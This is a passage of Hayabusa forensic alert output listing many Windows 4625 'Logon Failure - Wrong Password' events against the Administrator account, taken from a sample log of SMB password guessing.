NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wObt647cIBPiVaZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nYDe1L7NNxDGQ0Vt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXroClxv7B0aCTYv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kCVah2QOH1hMSV76 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2HjD65Xy4Hppim2l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwmEQxC4iTcF4aFu : IP Address: 192.168.198.149 : AuthPackage: 